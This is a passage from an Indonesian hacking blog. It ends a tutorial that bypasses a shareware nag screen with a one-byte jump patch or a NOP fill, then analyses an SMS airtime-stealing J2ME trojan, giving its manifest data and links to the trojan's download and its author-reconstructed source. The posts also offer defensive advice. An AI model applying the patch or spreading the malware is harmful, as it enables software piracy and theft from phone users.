  2. Merubah lompatan, cara ini adalah cara paling efektif dan efisien. Yaitu merubah arah tujuan dari lompatan instruksi, teknik ini hanya memerlukan perubahan nilai 1 byte saja!
    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

    Screenshot Method 1 – JUMP
    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
    Untuk menerapkan teknik ini cukup mudah, pada alamat 13141533 “JMP SHORT TARGET.1314156F”, rubahlah nilai “EB 3A” menjadi “EB 5F”. Hal ini akan membuat software tidak menghiraukan kode Nagscreen atau MessageBox dan langsung menuju alamat 13141594 “PUSH 0” untuk menjalankan program secara normal.. TANPA NAGSCREEN!
  3. Metode 2 – NOP
  4. Meniadakan proses instruksi, cara ini adalah cara efektif namun kurang efisien mengingat banyak terbentuknya Code Cave. Yaitu dengan meniadakan beberapa instruksi dengan cara merubahnya sebagai instruksi yang tidak dijalankan.
    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

    Screenshot Method 2 – NOP
    $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
    Untuk menerapkan teknik ini, cukup blok dengan cursor dari alamat 1314156F “PUSH 24” sampai dengan 13141581 “CALL <JMP.&USER32.MESSAGEBOXA>” (Referensi lihat Screenshot Assembly Code). Kemudian Klik kanan->Binary->Fill with NOPs. Hal ini akan membuat software tidak lagi mempunyai Nagscreen atau MessageBox, meskipun instruksi pemeriksaan masih ada namun tidak mempengaruhi kinerja software. Dengan begitu software akan menuju alamat 13141594 “PUSH 0” untuk menjalankan program secara normal.. TANPA NAGSCREEN!
Final Notes
Tugas sudah berhasil dikerjakan dengan baik, software “Target.exe” tidak lagi menampilkan Nagscreen atau MessageBox. Mudah bukan? Tidak sampai 1 Menit, Nagscreen berhasil dilumpuhkan. Software “Target.exe” hanyalah salah satu contoh nyata dari bugs shareware karena kelalaian Programmer (Mungkin saja programmernya dulu kuliah di jurusan ilmu manajemen dan kesehatan hewan seperti Saya, jadi sedikit lupa tentang cara pemrograman yang tepat :D ). Kenapa bisa begitu? Karena teknik diatas memakai “Text String” sebagai acuan.
Jika saja software tersebut menggunakan teknologi seperti obfuscation atau menyembunyikan string tentunya tidak akan semudah ini berhasil dilumpuhkan. Percaya atau tidak, hampir sekitar 70% software shareware di seluruh dunia menggunakan Nagscreen atau MessageBox dan menampilkan Text String! Terutama software shareware produksi dalam negeri! Saya yakin Anda bisa membayangkan betapa rumitnya hidup sebagai programmer dengan resiko software mereka dibajak. Saran untuk Anda, jangan pernah mempergunakan software bajakan. Jika Anda belum memiliki uang, menabunglah, belilah lisensi resmi jika sudah memiliki uang atau pergunakan Open Source. Programmer juga butuh makan, mereka menjual software agar bisa mendapatkan penghasilan. Hacker terlahir untuk membantu sesama, bukan merugikan sesama. Semoga artikel Saya bermanfaat bagi Anda dan dapat membantu Anda mengamankan diri dari kejahatan cyber. I am a Hacker.. I am a Cracker.. But I am still a Farmer! :)
Read More »

0 Trojan Horse Pada Java Mobile Phone

5:58 PM Under From Unknown
[0 Comment]
Seperti biasa Saya ingin menulis artikel yang mampu dimengerti oleh semua kalangan, tidak hanya untuk orang-orang yang memang berkonsentrasi pada bidang komputer, Saya ingin menulis artikel yang juga bisa dimengerti oleh tukang bakso, tukang ojek, penggembala kambing (seperti Saya :D ), tukang jagal, bang mamat tukang gali kubur, kang paijo penjaga warung, cak mansur di musholla sebelah dan lainnya. Maaf sangat tidak memungkinkan kalau Saya absen warga satu kelurahan seluruhnya, karena akan membuat artikel ini seperti data Dinas Sosial :D
Sebenarnya sangat sulit untuk menemukan Trojan Horse sederhana yang bisa dijadikan materi pembahasan pada artikel ini. Beberapa dari Trojan Horse menggunakan teknik elit yang tidak mudah dipahami oleh pemula sekalipun, mengingat Java adalah bahasa pemrograman High Level.
Untungnya setelah beberapa lama bergerilya di internet, kost dengan beberapa orang Rusia, Jerman dan Spanyol untuk mendapatkan referensi (Howdy, My Reverser friends.. You’re all awesome :D ) serta bertapa selama 7 hari, 7 malam, 7 jam, 7 menit, 7 detik lebih sedikit.. kurang 1 menit dibagi seperempat detik (Kata Pak guru matematika berapa hasilnya?? :D ), Saya bisa menemukan materi unik Trojan Horse dari Indonesia.

DEFINITION
Adalah program apapun yang memiliki tujuan tersembunyi. Trojan merupakan salah satu dari sekian banyak penyebab utama pembobolan sebuah sistem. Jika Anda mendapatkan sebuah program dari chat room, new group, atau dari e-mail yang tidak pernah diharapkan, program tersebut kemungkinan trojan dengan beberapa tujuan yang bersifat subversif. Sebagai contoh, Trojan bisa diprogram untuk menerima kata sandi dari user account yang bisa dipergunakan hacker memasuki kembali suatu sistem setiap saat. Rootkit seringkali berisi program-program trojan.
Trojan adalah program Rootkit 100% merugikan. Trojan hanya menguntungkan satu pihak saja, yaitu penyerang. Untungnya kemudahan dalam mendapatkan informasi mengenai Trojan di internet, membuat semua pengguna komputer lebih waspada. Namun hal inilah yang membuat Trojan mengalami beberapa perubahan yang variatif, Trojan tidak lagi sederhana dan mudah ditebak seperti jaman dulu, Trojan semakin unik seperti halnya pada Trojan yang dibahas pada artikel ini. Teknik Social Engineering menjadi salah satu alat efektif yang dipergunakan oleh penyerang untuk menyebarluaskan Trojan. Untuk mempelajari lebih lanjut mengenai program yang termasuk dalam keluarga Rootkit, Trojan dan karakteristiknya, Anda bisa membaca artikel Saya yang berjudul “Key Logger – Hack Tool Pencuri Informasi”

SOME USEFUL APIS
Di bawah ini Saya cantumkan beberapa fungsi Java API Wireless Toolkit yang dipergunakan pada pemrograman Trojan Java Mobile Phone :
1. javax.microedition.io
Class Connector
public class Connector
extends Object
Kelas ini adalah pabrik untuk menciptakan obyek Connection baru.
Penciptaan Koneksi-Koneksi dilakukan secara dinamis dengan melihat suatu implementasi kelas protokol yang namanya dibentuk dari nama platform (pembacaan dari sebuah sistem properti) dan nama protokol dari koneksi yang diminta (Diekstrak dari parameter string yang disediakan oleh aplikasi programmer.) Parameter string yang menjelaskan target harus sesuai dengan format URL seperti yang diuraikan pada RFC 2396.
{scheme}:[{target}][{params}]
where {scheme} is the name of a protocol such as http}.
The {target} is normally some kind of network address.
Any {params} are formed as a series of equates of the form “;x=y”. Example: “;type=a”.
2. javax.microedition.io
Interface Connection
public interface Connection
Ini adalah tipe yang paling dasar dari koneksi umum. Hanya metode terdekat yang didefinisikan. Tidak ada metode terbuka yang didefinisikan di sini sebab pembukaan selalu dilakukan dengan menggunakan metode Connector.open().
3. javax.microedition.midlet
Class MIDlet
public abstract class MIDlet
extends Object
MIDlet adalah sebuah aplikasi profil MID. Aplikasi tersebut harus memperluas kelas ini agar mengijinkan software manajemen aplikasi untuk mengendalikan MIDlet dan mampu mendapat kembali properti dari descriptor aplikasi dan perubahan status permintaan. Metode kelas ini mengijinkan software manajemen aplikasi untuk melakukan create, start, pause, dan destroy suatu MIDlet.
Constructor
  • MIDlet
  • protected MIDlet()
Method
  • getAppProperty
  • public final String getAppProperty(String key)
  • startApp
  • protected abstract void startApp()
    throws MIDletStateChangeException
  • pauseApp
  • protected abstract void pauseApp()
  • destroyApp
  • protected abstract void destroyApp(boolean unconditional)
    throws MIDletStateChangeException
  • notifyDestroyed
  • public final void notifyDestroyed()

ART OF ATTACKING
Anda bisa mendapatkan Trojan SMS ini di internet melalui mesin pencarian Google versi web ataupun versi mobile dengan mengetikan keyword “YAHOO MAIL INDOSAT 2011.JAR” di kolom pencarian. Sebelumnya, Saya ingin mengucapkan terima kasih kepada sang penyerang yang telah “BAIK HATI” meninggalkan informasi tentang dirinya dengan sangat jelas.. Sangat jarang seorang Hacker ataupun Cracker meninggalkan informasi pribadinya kecuali dengan alasan khusus karena hal tersebut adalah perbuatan bunuh diri! Pelacakan lokasi penyerang bisa dilakukan dari data Trojan, Server upload, Nomer telpon seluler, IP address, image header dan lainnya.. Hacker dan Cracker tidak akan melakukan tindakan kriminal dan kebodohan seperti ini, kecuali sang pembuat Trojan adalah maling kambuhan atau ingin menjadi artis dadakan di daftar pencarian orang Kepolisian! :D
$$$$$$$$$$$$$$$$$$$$
Program Content
Screenshot Program Content
Untuk membaca isi program “YAHOO MAIL INDOSAT 2011.JAR” Anda bisa mengetikkan perintah JAR TF “YAHOO MAIL INDOSAT 2011.JAR” pada console. Jika pada komputer Anda tidak terinstall Java, Anda bisa mempergunakan WinRAR, Winzip dan lainnya untuk melakukan ekstraksi file. Jangan lupa terlebih dahulu gantilah ekstensi program menjadi “ZIP”. Misalnya dari “YAHOO MAIL INDOSAT 2011.JAR” menjadi “YAHOO MAIL INDOSAT 2011.ZIP”. Dari data “MANIFEST.MF” yang ada, Saya menemukan beberapa hal :
Nama file : YAHOO MAIL INDOSAT 2011.JAR
Nama midlet : YAHOO ISAT
Tanggal pembuatan : 2009-11-15
Waktu pembuatan : 18:48
Nomer HP penyerang : 085751351335
Provider yang digunakan : INDOSAT (Kode Fitur 151)
Metode serangan : Transfer pulsa
Kerugian pulsa minimal : Rp. 2.000 – 10.000 Setiap launching
URL : http://luana.com
MicroEdition-Config : CLDC-1.0
MicroEdition-Profile : MIDP-2.0
Malware class : Cdacc5617db4e975c5890b0b913c21696
CATATAN : Data diatas sesuai dengan data asli penyerang yang tertera pada file “MANIFEST.MF” tanpa mengalami perubahan sedikitpun dari penulis. Anda bisa menganalisa dan membandingkan keaslian data dengan Trojan sejenis yang terdapat di internet. Untuk membaca data, Anda bisa mempergunakan Notepad.

Metode penyerangan adalah mengirimkan SMS transfer pulsa sebanyak 1-10 kali dengan nominal Rp. 2000,-/SMS setiap kali program dijalankan, dengan perantara fitur 151 provider INDOSAT. Teknik Social Engineering yang dipergunakan mirip dengan aplikasi game yang booming pada tahun 2004-2005, yang mengharuskan user untuk mengirimkan sejumlah SMS sebagai biaya pembelian sebelum game dijalankan. Kebanyakan user pasti tertipu jika tidak mengetahui apa yang sebenarnya mereka jalankan. Saya harap pihak kepolisian dan intelejen Indonesia meluangkan waktu membaca artikel ini, agar bisa menindaklanjuti serta mampu mengantisipasi kasus seperti ini di masa yang akan datang. Jadikan Indonesia lebih baik! (Go.. Go.. Go.. Indonesia Police Cyber! Chaya.. Chaya.. Indonesia Police Dancer.. Howdy, Briptu Norman Kamaru! :D )
Konsep Trojan secara keseluruhan mengadopsi konsep dari “J2ME/TrojanSMS.Konov”, hal ini bisa Anda lihat pada file binary “Cdacc5617db4e975c5890b0b913c21696.class”. Sebagai informasi, hanya beberapa orang Hacker di dunia ini yang mampu membaca file binary (bahasa mesin) secara langsung sebagai contoh rekan-rekan dari Metasploit dan rekan-rekan dari beberapa komunitas yang Saya sebutkan pada Greetz di bagian bawah artikel ini, Saya harap Anda tidak menemui kesulitan membaca file tersebut melalui Notepad atau Hexa Editor. Jangan kaget, karakter yang akan Anda jumpai mirip karakter alien dan cakar ayam :D
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Text View
Screenshot Text View
Kelebihan dari teknik Hacker bidang Reverse Engineering salah satunya adalah mampu membalik kode binary (Kode mesin) menjadi kode (Source Code) yang mudah dibaca oleh manusia. Bagi Anda yang bekerja sebagai programmer, alangkah baiknya untuk berhati-hati mengamankan software Anda. Sebuah software komersial yang dirubah menjadi Source Code akan membuat orang lain mampu membuat software yang mirip seperti buatan Anda, hanya dengan menjiplak kode software Anda!!! Dibawah ini screenshot favorit rekan-rekan Hacker bidang Reverse Engineering. Maaf, sengaja menampilkan beberapa baris saja.. Terlalu panjang jika menampilkan kode Assembly keseluruhan.. Toh sama saja hasilnya, karena source code yang sebenarnya cuma 42 baris.. Lagipula sesama reverser bisa mempelajari sendiri tanpa perlu membaca artikel ini :D
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Amazing Assembly
Screenshot Amazing Assembly
Jika Anda sudah patah hati karena kesulitan membaca binary, maka ada baiknya Anda membaca file “TrojanSMS.java” yang lebih manusiawi :D Memang tidak mudah membaca binary, jadi Saya meluangkan waktu mengkode ulang file binary yang ada menjadi Source Code bahasa pemrograman Java yang dapat dibaca oleh mata manusia. Saya harap Anda bisa memahami cara kerja Trojan SMS ini. “Wireless Toolkit” dibutuhkan sebagai media pemrograman Java Mobile Phone.
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
Source Code
Screenshot Source Code
PERHATIAN : Source code yang disertakan pada artikel ini hanya sebagai pembelajaran, bisa dicompile ulang untuk menghasilkan binary. Saya tidak bertanggungjawab terhadap penyalahgunaan, kerusakan, kerugian yang disebabkan oleh pihak lain melalui Source Code ini!!! Untuk mendapatkan Source Code lengkap silahkan kunjungi Website Saya.

FINAL NOTES
Trojan SMS diatas hanyalah salah satu dari sekian banyak Trojan yang mentargetkan Java Mobile Phone. Trojan ini bisa dikatakan sebagai Lame Trojan, dibuat oleh Lamer dan bisa dimodifikasi oleh Scriptkiddies dengan mudah. Namun jangan pernah menyepelekan hal kecil. Apa yang akan terjadi jika Trojan ini berada di tangan orang yang lebih cerdas dan disalahgunakan? Tentunya tidak akan lagi mencuri pulsa Anda, melainkan mencuri LOG, Cookies dan data pribadi lainnya yang tersimpan di Mobile Phone Anda!
Solusi murah dan praktis dari Saya untuk menghindari kejahatan Trojan Java Mobile Phone dan sejenisnya adalah selalu aktifkan hak akses seluruh software yang terdapat pada Mobile Phone Anda menjadi mode “Prompt” atau mode pemberitahuan. Misal : Network access, Read and Write data, Auto invocation, Messaging, Multimedia, Local connectivity, dan lainnya.
Saya sangat menyarankan kepada seluruh rekan-rekan yang membaca artikel ini untuk selalu waspada, jika Antivirus Anda tidak mendeteksi file Trojan SMS yang disertakan bersama artikel ini, silahkan menghubungi vendor Antivirus yang Anda miliki. Dengan cara mengirimkan sampel file “YAHOO MAIL INDOSAT 2011.JAR” ke vendor Antivirus. Jika Anda mengklaim diri Anda sebagai seorang Hacker tentunya Anda tidak ingin memperparah keadaan dengan menyembunyikan ataupun mempergunakan kode ini untuk kejahatan, bukan? Hacker sejati tidak berbuat kriminal dan merugikan orang lain, Hacker sejati melakukan sesuatu yang berarti bagi seluruh umat manusia sesuai dengan kode etik Hacker dan Jargon. Orang yang berbuat kriminal melalui komputer, merugikan, ingin untung sendiri dan tidak memikirkan nasib orang lain adalah MALING alias KRIMINAL alias TERORIS bukan Hacker, bukan juga bagian dari komunitas Hacker dan Binus Hacker. Semoga artikel Saya bermanfaat dan dapat membantu Anda mengamankan diri dari kejahatan cyber. I am Hacker, I am Cracker.. I am still a Farmer :D

DOWNLOAD TROJAN HORSE MOBILE PHONE .JAR
Read More »